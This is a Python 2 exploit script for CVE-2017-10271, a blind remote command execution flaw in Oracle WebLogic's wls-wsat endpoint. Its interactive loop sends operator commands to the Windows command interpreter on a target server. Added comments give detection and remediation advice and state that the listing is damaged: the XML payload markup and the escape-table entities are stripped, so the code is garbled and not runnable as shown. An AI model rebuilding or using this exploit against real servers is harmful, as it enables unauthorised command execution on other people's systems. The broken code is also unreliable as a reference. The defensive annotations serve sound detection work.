import requests
import sys
# Base URL of the server under test, taken verbatim from the first
# command-line argument; nothing here validates or normalises it.
url_in = sys.argv[1]
# Fixed path every request is sent to. POSTs to /wls-wsat/CoordinatorPortType
# are the network-visible artefact of this script: search web-server, proxy
# and WAF logs for them, and block /wls-wsat/ at the edge wherever the
# component is not needed.
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
# Header sent with every request; it declares the body as XML.
payload_header = {'content-type': 'text/xml'}
# Build the request body for one command string and return it.
#
# NOTE(review): this listing is damaged by extraction and is not runnable as
# shown. Indentation is gone. Every value in html_escape_table has lost its
# entity text, so each key now maps to itself and the '"' entry is no longer a
# valid string literal. The literals concatenated into payload_1 have lost
# their markup, leaving only whitespace and the fragments " cmd " and " /c ".
# The code is left exactly as found.
#
# Detection: the surviving " cmd " and " /c " fragments show that the body asks
# for the Windows command interpreter. On the host, the signal to alert on is
# the application server's process starting cmd (presumably the WebLogic Java
# process; confirm the parent image name in your deployment).
def payload_command (command_in):
# command_in is mapped character by character through html_escape_table,
# spliced between the fixed literals below, and the joined string is returned.
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in)+""
payload_1 = " \n" \
" " \
" \n" \
" \n" \
" \n" \
" " \
" " \
" cmd " \
" " \
" " \
" /c " \
" " \
" " \
+ command_filtered + \
" " \
" " \
" " \
" " \
" " \
" " \
" " \
" " \
""
return payload_1
# Send one generated body to payload_url and print a one-line verdict.
#
# command_in is passed to payload_command() and the result is POSTed with
# payload_header. No timeout is given to requests.post, so an unresponsive
# server blocks the call indefinitely.
#
# Only the status code is inspected; the response body is never read. A 500 is
# printed as "Command Executed" and every other status as "Something Went
# Wrong", so the verdict is a heuristic and not confirmation of anything.
# Triage: POSTs to this path that end in HTTP 500 are worth pulling from access
# logs, but the status alone is not evidence either way. Correlate it with
# process-creation telemetry on the server.
def do_post(command_in):
result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
if result.status_code == 500:
print "Command Executed \n"
else:
print "Something Went Wrong \n"
# Banner. It names CVE-2017-10271 and describes the script as "blind": no
# command output comes back to the operator. Remediation is the vendor fix for
# that CVE, plus removing or blocking the /wls-wsat/ endpoint where unused.
print "***************************************************** \n" \
"**************** Coded By 1337g ****************** \n" \
"* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \
"***************************************************** \n"
# Interactive loop (Python 2 only: print statement and raw_input). Each line
# read is passed to do_post() unchanged; the literal "exit" ends the process.
# Every iteration issues one POST, so repeated requests to the same path from
# one client in a short window are what this loop looks like in logs.
while 1:
command_in = raw_input("Eneter your command here: ")
if command_in == "exit" : exit(0)
do_post(command_in)